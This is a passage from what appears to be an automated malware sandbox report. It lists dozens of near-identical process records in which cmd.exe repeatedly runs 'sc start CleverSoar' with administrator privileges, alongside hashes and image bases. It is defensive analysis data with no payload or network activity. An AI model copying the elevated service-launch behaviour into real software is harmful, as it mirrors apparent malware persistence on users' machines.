                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:46
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:47
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:50
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:51
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:52
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:53
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:54
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:55
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:56
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:57
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:58
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:59
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:60
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:61
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:62
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:63
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:64
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:65
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:66
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:67
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:68
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:69
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:70
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:71
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:72
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:73
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:74
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:75
                                                        Start time:01:50:57
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:76
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:77
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:78
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:79
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:80
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:81
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:82
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:83
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:84
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:85
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:86
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:87
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:88
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:89
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:90
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:91
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:92
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:93
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:94
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:95
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:96
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:97
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:98
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:99
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:100
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:101
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:102
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:103
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:104
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:105
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:106
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:107
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
